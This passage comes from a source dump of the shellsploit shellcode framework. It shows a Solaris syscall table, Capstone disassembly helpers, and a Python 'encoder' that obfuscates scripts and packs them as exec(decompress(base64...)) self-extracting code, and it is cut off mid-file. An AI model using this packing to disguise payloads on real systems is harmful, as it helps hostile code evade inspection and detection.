251 | "sendmsg":"241", 252 | "sendto":"242", 253 | "getpeername":"243", 254 | "getsockname":"244", 255 | "getsockopt":"245", 256 | "setsockopt":"246", 257 | "sockconfig":"247", 258 | "ntp_gettime":"248", 259 | "ntp_adjtime":"249", 260 | "lwp_mutex_unlock":"250", 261 | "lwp_mutex_trylock":"251", 262 | "lwp_mutex_register":"252", 263 | "cladm":"253", 264 | "uucopy":"254", 265 | "umount2":"255" 266 | 267 | } 268 | 269 | if key == None: 270 | for key in list.keys(): 271 | if list[key] == sys: 272 | return key 273 | else: 274 | return hex(int(list[sys])).replace("0x", "") 275 | 276 | def SolarisInterrupted(): 277 | return "91" 278 | 279 | #print SolarisSystemcall( "execve", True) 280 | 281 | -------------------------------------------------------------------------------- /shellsploit/disassembly/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/disassembly/__init__.py -------------------------------------------------------------------------------- /shellsploit/disassembly/capstoneheader.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | 10 | from capstone import * 11 | from binascii import hexlify 12 | 13 | 14 | ARCH = { 15 | 'arm': CS_ARCH_ARM, 16 | 'arm64': CS_ARCH_ARM64, 17 | 'mips': CS_ARCH_MIPS, 18 | 'ppc': CS_ARCH_PPC, 19 | 'x86': CS_ARCH_X86, 20 | 'xcore': CS_ARCH_XCORE 21 | } 22 | 23 | MODE = { 24 | '16': CS_MODE_16, 25 | '32': CS_MODE_32, 26 | '64': CS_MODE_64, 27 | 'arm': CS_MODE_ARM, 28 | 'be': CS_MODE_BIG_ENDIAN, 29 | 'le': CS_MODE_LITTLE_ENDIAN, 30 | 'micro': CS_MODE_MICRO, 31 | 'thumb': CS_MODE_THUMB 32 | } 33 | 34 | test = [] 35 | -------------------------------------------------------------------------------- /shellsploit/disassembly/dis.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from capstoneheader import * 10 | 11 | 12 | def disas(shellcode, bits=32): 13 | if bits == 32: 14 | md = Cs(CS_ARCH_X86, CS_MODE_32) 15 | elif bits == 64: 16 | md = Cs(CS_ARCH_X86, CS_MODE_64) 17 | 18 | for i in md.disasm(shellcode, 0x00000): 19 | if len(hexlify(i.bytes)) > 6: 20 | db = "\t0x%x:\t%s\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 21 | else: 22 | db = "\t0x%x:\t%s\t\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 23 | test.append(db) 24 | return "\n" + "\n".join(test) + "\n" 25 | -------------------------------------------------------------------------------- /shellsploit/disassembly/dis2.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from capstoneheader import * 10 | 11 | 12 | def disasNOTintel(shellcode, choice, bits=32): 13 | if choice == "arm": 14 | if bits == 64: 15 | md = Cs(CS_ARCH_ARM64, CS_MODE_ARM) 16 | else: 17 | md = Cs(CS_ARCH_ARM32, CS_MODE_ARM) 18 | else: 19 | # Must be test .. 20 | if bits == 64: 21 | md = Cs(CS_ARCH_MIPS, CS_MODE_64) 22 | else: 23 | md = Cs(CS_ARCH_MIPS, CS_MODE_32) 24 | 25 | for i in md.disasm(shellcode, 0x00000): 26 | if len(hexlify(i.bytes)) > 6: 27 | db = "\t0x%x:\t%s\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 28 | else: 29 | db = "\t0x%x:\t%s\t\t%s %s" % (i.address, hexlify(i.bytes), i.mnemonic, i.op_str) 30 | test.append(db) 31 | return "\n" + "\n".join(test) + "\n" 32 | -------------------------------------------------------------------------------- /shellsploit/encoders/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/encoders/__init__.py -------------------------------------------------------------------------------- /shellsploit/encoders/py/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/encoders/py/__init__.py -------------------------------------------------------------------------------- /shellsploit/encoders/py/payloads.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | class Encoders(object): 10 | def __init__(self): 11 | self.py = [ 12 | 'encoders/py/bzip2', 13 | "encoders/py/gzip", 14 | ] 15 | 16 | def ret(self): 17 | return len(self.py) 18 | -------------------------------------------------------------------------------- /shellsploit/encoders/py/pyminifier/analyze.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | __doc__ = """\ 4 | A module of useful functions for analyzing Python code. 5 | """ 6 | 7 | # Import builtins 8 | import os 9 | import sys 10 | import re 11 | import tokenize 12 | import keyword 13 | try: 14 | import cStringIO as io 15 | except ImportError: # Ahh, Python 3 16 | import io 17 | 18 | # Globals 19 | py3 = False 20 | 21 | if not isinstance(sys.version_info, tuple): 22 | if sys.version_info.major == 3: 23 | py3 = True 24 | 25 | shebang = re.compile('^#\!.*$') 26 | encoding = re.compile(".*coding[:=]\s*([-\w.]+)") 27 | # __builtins__ is different for every module so we need a hard-coded list: 28 | builtins = [ 29 | 'ArithmeticError', 30 | 'AssertionError', 31 | 'AttributeError', 32 | 'BaseException', 33 | 'BufferError', 34 | 'BytesWarning', 35 | 'DeprecationWarning', 36 | 'EOFError', 37 | 'Ellipsis', 38 | 'EnvironmentError', 39 | 'Exception', 40 | 'False', 41 | 'FloatingPointError', 42 | 'FutureWarning', 43 | 'GeneratorExit', 44 | 'IOError', 45 | 'ImportError', 46 | 'ImportWarning', 47 | 'IndentationError', 48 | 'IndexError', 49 | 'KeyError', 50 | 'KeyboardInterrupt', 51 | 'LookupError', 52 | 'MemoryError', 53 | 'NameError', 54 | 'None', 55 | 'NotImplemented', 56 | 'NotImplementedError', 57 | 'OSError', 58 | 'OverflowError', 59 | 'PendingDeprecationWarning', 60 | 'ReferenceError', 61 | 'RuntimeError', 62 | 'RuntimeWarning', 63 | 'StandardError', 64 | 'StopIteration', 65 | 'SyntaxError', 66 | 'SyntaxWarning', 67 | 'SystemError', 68 | 'SystemExit', 69 | 'TabError', 70 | 'True', 71 | 'TypeError', 72 | 'UnboundLocalError', 73 | 'UnicodeDecodeError', 74 | 'UnicodeEncodeError', 75 | 'UnicodeError', 76 | 'UnicodeTranslateError', 77 | 'UnicodeWarning', 78 | 'UserWarning', 79 | 'ValueError', 80 | 'Warning', 81 | 'ZeroDivisionError', 82 | '__IPYTHON__', 83 | '__IPYTHON__active', 84 | '__debug__', 85 | '__doc__', 86 | '__import__', 87 | '__name__', 88 | '__package__', 89 | 'abs', 90 | 'all', 91 | 'any', 92 | 'apply', 93 | 'basestring', 94 | 'bin', 95 | 'bool', 96 | 'buffer', 97 | 'bytearray', 98 | 'bytes', 99 | 'callable', 100 | 'chr', 101 | 'classmethod', 102 | 'cmp', 103 | 'coerce', 104 | 'compile', 105 | 'complex', 106 | 'copyright', 107 | 'credits', 108 | 'delattr', 109 | 'dict', 110 | 'dir', 111 | 'divmod', 112 | 'dreload', 113 | 'enumerate', 114 | 'eval', 115 | 'execfile', 116 | 'exit', 117 | 'file', 118 | 'filter', 119 | 'float', 120 | 'format', 121 | 'frozenset', 122 | 'getattr', 123 | 'globals', 124 | 'hasattr', 125 | 'hash', 126 | 'help', 127 | 'hex', 128 | 'id', 129 | 'input', 130 | 'int', 131 | 'intern', 132 | 'ip_set_hook', 133 | 'ipalias', 134 | 'ipmagic', 135 | 'ipsystem', 136 | 'isinstance', 137 | 'issubclass', 138 | 'iter', 139 | 'jobs', 140 | 'len', 141 | 'license', 142 | 'list', 143 | 'locals', 144 | 'long', 145 | 'map', 146 | 'max', 147 | 'min', 148 | 'next', 149 | 'object', 150 | 'oct', 151 | 'open', 152 | 'ord', 153 | 'pow', 154 | 'print', 155 | 'property', 156 | 'quit', 157 | 'range', 158 | 'raw_input', 159 | 'reduce', 160 | 'reload', 161 | 'repr', 162 | 'reversed', 163 | 'round', 164 | 'set', 165 | 'setattr', 166 | 'slice', 167 | 'sorted', 168 | 'staticmethod', 169 | 'str', 170 | 'sum', 171 | 'super', 172 | 'tuple', 173 | 'type', 174 | 'unichr', 175 | 'unicode', 176 | 'vars', 177 | 'xrange', 178 | 'zip' 179 | ] 180 | 181 | reserved_words = keyword.kwlist + builtins 182 | 183 | 184 | def enumerate_keyword_args(tokens): 185 | """ 186 | Iterates over *tokens* and returns a dictionary with function names as the 187 | keys and lists of keyword arguments as the values. 188 | """ 189 | keyword_args = {} 190 | inside_function = False 191 | for index, tok in enumerate(tokens): 192 | token_type = tok[0] 193 | token_string = tok[1] 194 | if token_type == tokenize.NEWLINE: 195 | inside_function = False 196 | if token_type == tokenize.NAME: 197 | if token_string == "def": 198 | function_name = tokens[index + 1][1] 199 | inside_function = function_name 200 | keyword_args.update({function_name: []}) 201 | elif inside_function: 202 | if tokens[index + 1][1] == '=': # keyword argument 203 | keyword_args[function_name].append(token_string) 204 | return keyword_args 205 | 206 | 207 | def enumerate_imports(tokens): 208 | """ 209 | Iterates over *tokens* and returns a list of all imported modules. 210 | 211 | .. note:: This ignores imports using the 'as' and 'from' keywords. 212 | """ 213 | imported_modules = [] 214 | import_line = False 215 | from_import = False 216 | for index, tok in enumerate(tokens): 217 | token_type = tok[0] 218 | token_string = tok[1] 219 | if token_type == tokenize.NEWLINE: 220 | import_line = False 221 | from_import = False 222 | elif token_string == "import": 223 | import_line = True 224 | elif token_string == "from": 225 | from_import = True 226 | elif import_line: 227 | if token_type == tokenize.NAME and tokens[index + 1][1] != 'as': 228 | if not from_import: 229 | if token_string not in reserved_words: 230 | if token_string not in imported_modules: 231 | imported_modules.append(token_string) 232 | return imported_modules 233 | 234 | 235 | def enumerate_global_imports(tokens): 236 | """ 237 | Returns a list of all globally imported modules (skips modules imported 238 | inside of classes, methods, or functions). Example:: 239 | 240 | >>> enumerate_global_modules(tokens) 241 | ['sys', 'os', 'tokenize', 're'] 242 | 243 | .. note:: 244 | 245 | Does not enumerate imports using the 'from' or 'as' keywords. 246 | """ 247 | imported_modules = [] 248 | import_line = False 249 | from_import = False 250 | parent_module = "" 251 | function_count = 0 252 | indentation = 0 253 | for index, tok in enumerate(tokens): 254 | token_type = tok[0] 255 | token_string = tok[1] 256 | if token_type == tokenize.INDENT: 257 | indentation += 1 258 | elif token_type == tokenize.DEDENT: 259 | indentation -= 1 260 | elif token_type == tokenize.NEWLINE: 261 | import_line = False 262 | from_import = False 263 | elif token_type == tokenize.NAME: 264 | if token_string in ["def", "class"]: 265 | function_count += 1 266 | if indentation == function_count - 1: 267 | function_count -= 1 268 | elif function_count >= indentation: 269 | if token_string == "import": 270 | import_line = True 271 | elif token_string == "from": 272 | from_import = True 273 | elif import_line: 274 | if token_type == tokenize.NAME \ 275 | and tokens[index + 1][1] != 'as': 276 | if not from_import \ 277 | and token_string not in reserved_words: 278 | if token_string not in imported_modules: 279 | if tokens[index + 1][1] == '.': # module.module 280 | parent_module = token_string + '.' 281 | else: 282 | if parent_module: 283 | module_string = ( 284 | parent_module + token_string) 285 | imported_modules.append(module_string) 286 | parent_module = '' 287 | else: 288 | imported_modules.append(token_string) 289 | 290 | return imported_modules 291 | 292 | # TODO: Finish this (even though it isn't used): 293 | 294 | 295 | def enumerate_dynamic_imports(tokens): 296 | """ 297 | Returns a dictionary of all dynamically imported modules (those inside of 298 | classes or functions) in the form of {: []} 299 | 300 | Example: 301 | >>> enumerate_dynamic_modules(tokens) 302 | {'myfunc': ['zlib', 'base64']} 303 | """ 304 | imported_modules = [] 305 | import_line = False 306 | for index, tok in enumerate(tokens): 307 | token_type = tok[0] 308 | token_string = tok[1] 309 | if token_type == tokenize.NEWLINE: 310 | import_line = False 311 | elif token_string == "import": 312 | try: 313 | if tokens[index - 1][0] == tokenize.NEWLINE: 314 | import_line = True 315 | except IndexError: 316 | import_line = True # Just means this is the first line 317 | elif import_line: 318 | if token_type == tokenize.NAME and tokens[index + 1][1] != 'as': 319 | if token_string not in reserved_words: 320 | if token_string not in imported_modules: 321 | imported_modules.append(token_string) 322 | return imported_modules 323 | 324 | 325 | def enumerate_method_calls(tokens, modules): 326 | """ 327 | Returns a list of all object (not module) method calls in the given tokens. 328 | 329 | *modules* is expected to be a list of all global modules imported into the 330 | source code we're working on. 331 | 332 | For example: 333 | >>> enumerate_method_calls(tokens) 334 | ['re.compile', 'sys.argv', 'f.write'] 335 | """ 336 | out = [] 337 | for index, tok in enumerate(tokens): 338 | token_type = tok[0] 339 | token_string = tok[1] 340 | if token_type == tokenize.NAME: 341 | next_tok_string = tokens[index + 1][1] 342 | if next_tok_string == '(': # Method call 343 | prev_tok_string = tokens[index - 1][1] 344 | # Check if we're attached to an object or module 345 | if prev_tok_string == '.': # We're attached 346 | prev_prev_tok_string = tokens[index - 2][1] 347 | if prev_prev_tok_string not in ['""', "''", ']', ')', '}']: 348 | if prev_prev_tok_string not in modules: 349 | to_replace = "%s.%s" % ( 350 | prev_prev_tok_string, token_string) 351 | if to_replace not in out: 352 | out.append(to_replace) 353 | return out 354 | 355 | 356 | def enumerate_builtins(tokens): 357 | """ 358 | Returns a list of all the builtins being used in *tokens*. 359 | """ 360 | out = [] 361 | for index, tok in enumerate(tokens): 362 | token_type = tok[0] 363 | token_string = tok[1] 364 | if token_string in builtins: 365 | # Note: I need to test if print can be replaced in Python 3 366 | special_special = ['print'] # Print is special in Python 2 367 | if py3: 368 | special_special = [] 369 | if token_string not in special_special: 370 | if not token_string.startswith('__'): # Don't count magic funcs 371 | if tokens[index - 1][1] != '.' and tokens[index + 1][1] != '=': 372 | if token_string not in out: 373 | out.append(token_string) 374 | return out 375 | 376 | 377 | def enumerate_import_methods(tokens): 378 | """ 379 | Returns a list of imported module methods (such as re.compile) inside 380 | *tokens*. 381 | """ 382 | global_imports = enumerate_global_imports(tokens) 383 | out = [] 384 | for item in global_imports: 385 | for index, tok in enumerate(tokens): 386 | try: 387 | next_tok = tokens[index + 1] 388 | try: 389 | next_next_tok = tokens[index + 2] 390 | except IndexError: 391 | # Pretend it is a newline 392 | next_next_tok = (54, '\n', (1, 1), (1, 2), '#\n') 393 | except IndexError: # Last token, no biggie 394 | # Pretend it is a newline here too 395 | next_tok = (54, '\n', (1, 1), (1, 2), '#\n') 396 | token_type = tok[0] 397 | token_string = tok[1] 398 | if token_string == item: 399 | if next_tok[1] == '.': # We're calling a method 400 | module_method = "%s.%s" % (token_string, next_next_tok[1]) 401 | if module_method not in out: 402 | out.append(module_method) 403 | return out 404 | 405 | 406 | def enumerate_local_modules(tokens, path): 407 | """ 408 | Returns a list of modules inside *tokens* that are local to *path*. 409 | 410 | **Note:** Will recursively look inside *path* for said modules. 411 | """ 412 | # Have to get a list of all modules before we can do anything else 413 | modules = enumerate_imports(tokens) 414 | local_modules = [] 415 | parent = "" 416 | # Now check the local dir for matching modules 417 | for root, dirs, files in os.walk(path): 418 | if not parent: 419 | parent = os.path.split(root)[1] 420 | for f in files: 421 | if f.endswith('.py'): 422 | f = f[:-3] # Strip .py 423 | module_tree = root.split(parent)[1].replace('/', '.') 424 | module_tree = module_tree.lstrip('.') 425 | if module_tree: 426 | module = "%s.%s" % (module_tree, f) 427 | else: 428 | module = f 429 | if not module in modules: 430 | local_modules.append(module) 431 | return local_modules 432 | 433 | 434 | def get_shebang(tokens): 435 | """ 436 | Returns the shebang string in *tokens* if it exists. None if not. 437 | """ 438 | # This (short) loop preserves shebangs and encoding strings: 439 | for tok in tokens[0:4]: # Will always be in the first four tokens 440 | line = tok[4] 441 | # Save the first comment line if it starts with a shebang 442 | # (e.g. '#!/usr/bin/env python') 443 | if shebang.match(line): # Must be first line 444 | return line 445 | -------------------------------------------------------------------------------- /shellsploit/encoders/py/pyminifier/compression.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | __doc__ = """\ 4 | compression.py - A module providing functions to turn a python script into a 5 | self-executing archive in a few different formats... 6 | 7 | **gz_pack format:** 8 | 9 | - Typically provides better compression than bzip2 (for Python scripts). 10 | - Scripts compressed via this method can still be imported as modules. 11 | - The resulting binary data is base64-encoded which isn't optimal compression. 12 | 13 | **bz2_pack format:** 14 | 15 | - In some cases may provide better compression than gzip. 16 | - Scripts compressed via this method can still be imported as modules. 17 | - The resulting binary data is base64-encoded which isn't optimal compression. 18 | 19 | **lzma_pack format:** 20 | 21 | - In some cases may provide better compression than bzip2. 22 | - Scripts compressed via this method can still be imported as modules. 23 | - The resulting binary data is base64-encoded which isn't optimal compression. 24 | 25 | The gz_pack, bz2_pack, and lzma_pack formats only work on individual .py 26 | files. To pack a number of files at once using this method use the 27 | ``--destdir`` command line option: 28 | 29 | .. code-block: shell 30 | 31 | $ pyminifier --gzip --destdir=/tmp/minified *.py 32 | 33 | **zip_pack format:** 34 | 35 | - Provides the best compression of Python scripts. 36 | - Resulting script cannot be imported as a module. 37 | - Any required modules that are local (implied path) will be automatically included in the archive. 38 | """ 39 | 40 | # Import standard library modules 41 | import os 42 | import sys 43 | import tempfile 44 | import shutil 45 | 46 | # Import our own supporting modules 47 | from . import analyze, token_utils, minification, obfuscate 48 | 49 | py3 = False 50 | if not isinstance(sys.version_info, tuple): 51 | if sys.version_info.major == 3: 52 | py3 = True 53 | 54 | 55 | def bz2_pack(source): 56 | """ 57 | Returns 'source' as a bzip2-compressed, self-extracting python script. 58 | 59 | .. note:: 60 | 61 | This method uses up more space than the zip_pack method but it has the 62 | advantage in that the resulting .py file can still be imported into a 63 | python program. 64 | """ 65 | import bz2 66 | import base64 67 | out = "" 68 | # Preserve shebangs (don't care about encodings for this) 69 | first_line = source.split('\n')[0] 70 | if analyze.shebang.match(first_line): 71 | if py3: 72 | if first_line.rstrip().endswith('python'): # Make it python3 73 | first_line = first_line.rstrip() 74 | first_line += '3' # !/usr/bin/env python3 75 | out = first_line + '\n' 76 | compressed_source = bz2.compress(source.encode('utf-8')) 77 | out += 'import bz2, base64\n' 78 | out += "exec(bz2.decompress(base64.b64decode('" 79 | out += base64.b64encode(compressed_source).decode('utf-8') 80 | out += "')))\n" 81 | return out 82 | 83 | 84 | def gz_pack(source): 85 | """ 86 | Returns 'source' as a gzip-compressed, self-extracting python script. 87 | 88 | .. note:: 89 | 90 | This method uses up more space than the zip_pack method but it has the 91 | advantage in that the resulting .py file can still be imported into a 92 | python program. 93 | """ 94 | import zlib 95 | import base64 96 | out = "" 97 | # Preserve shebangs (don't care about encodings for this) 98 | first_line = source.split('\n')[0] 99 | if analyze.shebang.match(first_line): 100 | if py3: 101 | if first_line.rstrip().endswith('python'): # Make it python3 102 | first_line = first_line.rstrip() 103 | first_line += '3' # !/usr/bin/env python3 104 | out = first_line + '\n' 105 | compressed_source = zlib.compress(source.encode('utf-8')) 106 | out += 'import zlib, base64\n' 107 | out += "exec(zlib.decompress(base64.b64decode('" 108 | out += base64.b64encode(compressed_source).decode('utf-8') 109 | out += "')))\n" 110 | return out 111 | 112 | 113 | def lzma_pack(source): 114 | """ 115 | Returns 'source' as a lzma-compressed, self-extracting python script. 116 | 117 | .. note:: 118 | 119 | This method uses up more space than the zip_pack method but it has the 120 | advantage in that the resulting .py file can still be imported into a 121 | python program. 122 | """ 123 | import lzma 124 | import base64 125 | out = "" 126 | # Preserve shebangs (don't care about encodings for this) 127 | first_line = source.split('\n')[0] 128 | if analyze.shebang.match(first_line): 129 | if py3: 130 | if first_line.rstrip().endswith('python'): # Make it python3 131 | first_line = first_line.rstrip() 132 | first_line += '3' # !/usr/bin/env python3 133 | out = first_line + '\n' 134 | compressed_source = lzma.compress(source.encode('utf-8')) 135 | out += 'import lzma, base64\n' 136 | out += "exec(lzma.decompress(base64.b64decode('" 137 | out += base64.b64encode(compressed_source).decode('utf-8') 138 | out += "')))\n" 139 | return out 140 | 141 | 142 | def prepend(line, path): 143 | """ 144 | Appends *line* to the _beginning_ of the file at the given *path*. 145 | 146 | If *line* doesn't end in a newline one will be appended to the end of it. 147 | """ 148 | if isinstance(line, str): 149 | line = line.encode('utf-8') 150 | if not line.endswith(b'\n'): 151 | line += b'\n' 152 | temp = tempfile.NamedTemporaryFile('wb') 153 | temp_name = temp.name # We really only need a random path-safe name 154 | temp.close() 155 | with open(temp_name, 'wb') as temp: 156 | temp.write(line) 157 | with open(path, 'rb') as r: 158 | temp.write(r.read()) 159 | # Now replace the original with the modified version 160 | shutil.move(temp_name, path) 161 | 162 | 163 | def zip_pack(filepath, options): 164 | """ 165 | Creates a zip archive containing the script at *filepath* along with all 166 | imported modules that are local to *filepath* as a self-extracting python 167 | script. A shebang will be appended to the beginning of the resulting 168 | zip archive which will allow it to 169 | 170 | If being run inside Python 3 and the `lzma` module is available the 171 | resulting 'pyz' file will use ZIP_LZMA compression to maximize compression. 172 | 173 | *options* is expected to be the the same options parsed from pyminifier.py 174 | on the command line. 175 | 176 | .. note:: 177 | 178 | * The file resulting from this method cannot be imported as a module into another python program (command line execution only). 179 | * Any required local (implied path) modules will be automatically included (well, it does its best). 180 | * The result will be saved as a .pyz file (which is an extension I invented for this format). 181 | """ 182 | import zipfile 183 | # Hopefully some day we'll be able to use ZIP_LZMA too as the compression 184 | # format to save even more space... 185 | compression_format = zipfile.ZIP_DEFLATED 186 | cumulative_size = 0 # For tracking size reduction stats 187 | # Record the filesize for later comparison 188 | cumulative_size += os.path.getsize(filepath) 189 | dest = options.pyz 190 | z = zipfile.ZipFile(dest, "w", compression_format) 191 | # Take care of minifying our primary script first: 192 | source = open(filepath).read() 193 | primary_tokens = token_utils.listified_tokenizer(source) 194 | # Preserve shebangs (don't care about encodings for this) 195 | shebang = analyze.get_shebang(primary_tokens) 196 | if not shebang: 197 | # We *must* have a shebang for this to work so make a conservative default: 198 | shebang = "#!/usr/bin/env python" 199 | if py3: 200 | if shebang.rstrip().endswith('python'): # Make it python3 (to be safe) 201 | shebang = shebang.rstrip() 202 | shebang += '3\n' # !/usr/bin/env python3 203 | if not options.nominify: # Minify as long as we don't have this option set 204 | source = minification.minify(primary_tokens, options) 205 | # Write out to a temporary file to add to our zip 206 | temp = tempfile.NamedTemporaryFile(mode='w') 207 | temp.write(source) 208 | temp.flush() 209 | # Need the path where the script lives for the next steps: 210 | path = os.path.split(filepath)[0] 211 | if not path: 212 | path = os.getcwd() 213 | main_py = path + '/__main__.py' 214 | if os.path.exists(main_py): 215 | # There's an existing __main__.py, use it 216 | z.write(main_py, '__main__.py') 217 | z.write(temp.name, os.path.split(filepath)[1]) 218 | else: 219 | # No __main__.py so we rename our main script to be the __main__.py 220 | # This is so it will still execute as a zip 221 | z.write(filepath, '__main__.py') 222 | temp.close() 223 | # Now write any required modules into the zip as well 224 | local_modules = analyze.enumerate_local_modules(primary_tokens, path) 225 | name_generator = None # So we can tell if we need to obfuscate 226 | if options.obfuscate or options.obf_classes \ 227 | or options.obf_functions or options.obf_variables \ 228 | or options.obf_builtins or options.obf_import_methods: 229 | # Put together that will be used for all obfuscation functions: 230 | identifier_length = int(options.replacement_length) 231 | if options.use_nonlatin: 232 | if sys.version_info[0] == 3: 233 | name_generator = obfuscate.obfuscation_machine( 234 | use_unicode=True, identifier_length=identifier_length 235 | ) 236 | else: 237 | print( 238 | "ERROR: You can't use nonlatin characters without Python 3") 239 | sys.exit(2) 240 | else: 241 | name_generator = obfuscate.obfuscation_machine( 242 | identifier_length=identifier_length) 243 | table = [{}] 244 | included_modules = [] 245 | for module in local_modules: 246 | module = module.replace('.', '/') 247 | module = "%s.py" % module 248 | # Add the filesize to our total 249 | cumulative_size += os.path.getsize(module) 250 | # Also record that we've added it to the archive 251 | included_modules.append(module) 252 | # Minify these files too 253 | source = open(os.path.join(path, module)).read() 254 | tokens = token_utils.listified_tokenizer(source) 255 | maybe_more_modules = analyze.enumerate_local_modules(tokens, path) 256 | for mod in maybe_more_modules: 257 | if mod not in local_modules: 258 | local_modules.append(mod) # Extend the current loop, love it =) 259 | if not options.nominify: 260 | # Perform minification (this also handles obfuscation) 261 | source = minification.minify(tokens, options) 262 | # Have to re-tokenize for obfucation (it's quick): 263 | tokens = token_utils.listified_tokenizer(source) 264 | # Perform obfuscation if any of the related options were set 265 | if name_generator: 266 | obfuscate.obfuscate( 267 | module, 268 | tokens, 269 | options, 270 | name_generator=name_generator, 271 | table=table 272 | ) 273 | # Convert back to text 274 | result = token_utils.untokenize(tokens) 275 | # Write out to a temporary file to add to our zip 276 | temp = tempfile.NamedTemporaryFile(mode='w') 277 | temp.write(source) 278 | temp.flush() 279 | z.write(temp.name, module) 280 | temp.close() 281 | z.close() 282 | # Finish up by writing the shebang to the beginning of the zip 283 | prepend(shebang, dest) 284 | os.chmod(dest, 0o755) # Make it executable (since we added the shebang) 285 | pyz_filesize = os.path.getsize(dest) 286 | percent_saved = round(float(pyz_filesize) / float(cumulative_size) * 100, 2) 287 | print('%s saved as compressed executable zip: %s' % (filepath, dest)) 288 | print('The following modules were automatically included (as automagic ' 289 | 'dependencies):\n') 290 | for module in included_modules: 291 | print('\t%s' % module) 292 | print('\nOverall size reduction: %s%% of original size' % percent_saved) 293 | 294 | 295 | -------------------------------------------------------------------------------- /shellsploit/encoders/py/pyminifier/hero.py: -------------------------------------------------------------------------------- 1 | from optparse import OptionParser 2 | import sys 3 | from .opt import * 4 | 5 | from . import pyminify 6 | from . import __version__ 7 | 8 | """ 9 | -Lzma disable for a while.Coz pyminifer will be improve while merge to shellsploit.- 10 | 11 | py3 = False 12 | lzma = False 13 | if not isinstance(sys.version_info, tuple): 14 | if sys.version_info.major == 3: 15 | py3 = True 16 | try: 17 | import lzma 18 | except ImportError: 19 | pass 20 | else: 21 | import pylzma as lzma 22 | """ 23 | 24 | 25 | 26 | def main(**kwargs): 27 | options = Namespace(obf_functions=False, obf_import_methods=False, pyz=None, nominify=False, obf_classes=False, tabs=False, replacement_length= 1, bzip2=kwargs['bzip2'], destdir='./minified', prepend=None, obf_variables=False, outfile=None, obf_builtins=False, obfuscate=kwargs['obfuscate'], gzip=kwargs['gzip'], use_nonlatin=False) 28 | pyminify(options, kwargs['files']) 29 | 30 | 31 | -------------------------------------------------------------------------------- /shellsploit/encoders/py/pyminifier/opt.py: -------------------------------------------------------------------------------- 1 | class Namespace(object): 2 | def __init__(self, **kwargs): 3 | self.__dict__.update(kwargs) 4 | -------------------------------------------------------------------------------- /shellsploit/encoders/py/pyminifier/token_utils.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | __doc__ = """\ 4 | A couple of functions for dealing with tokens generated by the `tokenize` 5 | module. 6 | """ 7 | 8 | import tokenize 9 | try: 10 | import cStringIO as io 11 | except ImportError: # We're using Python 3 12 | import io 13 | 14 | 15 | def untokenize(tokens): 16 | """ 17 | Converts the output of tokenize.generate_tokens back into a human-readable 18 | string (that doesn't contain oddly-placed whitespace everywhere). 19 | 20 | .. note:: 21 | 22 | Unlike :meth:`tokenize.untokenize`, this function requires the 3rd and 23 | 4th items in each token tuple (though we can use lists *or* tuples). 24 | """ 25 | out = "" 26 | last_lineno = -1 27 | last_col = 0 28 | for tok in tokens: 29 | token_string = tok[1] 30 | start_line, start_col = tok[2] 31 | end_line, end_col = tok[3] 32 | # The following two conditionals preserve indentation: 33 | if start_line > last_lineno: 34 | last_col = 0 35 | if start_col > last_col and token_string != '\n': 36 | out += (" " * (start_col - last_col)) 37 | out += token_string 38 | last_col = end_col 39 | last_lineno = end_line 40 | return out 41 | 42 | 43 | def listified_tokenizer(source): 44 | """Tokenizes *source* and returns the tokens as a list of lists.""" 45 | io_obj = io.StringIO(source) 46 | return [list(a) for a in tokenize.generate_tokens(io_obj.readline)] 47 | -------------------------------------------------------------------------------- /shellsploit/encoders/py/starter.py: -------------------------------------------------------------------------------- 1 | #------------------Bombermans Team------------------------------------------# 2 | # Author : B3mB4m 3 | # Concat : b3mb4m@protonmail.com 4 | # Project : https://github.com/b3mb4m/shellsploit-library 5 | # LICENSE : https://github.com/b3mb4m/shellsploit-library/blob/master/LICENSE 6 | #----------------------------------------------------------------------------# 7 | 8 | 9 | from .payloads import * 10 | 11 | 12 | def control(**kwargs): 13 | if kwargs['payload'] in Encoders().py: 14 | from .pyminifier import hero 15 | if kwargs['iteration']: 16 | for x in range(int(kwargs['iteration'])): 17 | if "bzip2" in kwargs['payload']: 18 | hero.main(obfuscate=True, bzip2=True, gzip=False, files=kwargs['files']) 19 | elif "gzip" in kwargs['payload']: 20 | hero.main(obfuscate=True, bzip2=False, gzip=True, files=kwargs['files']) 21 | else: 22 | if "bzip2" in kwargs['payload']: 23 | 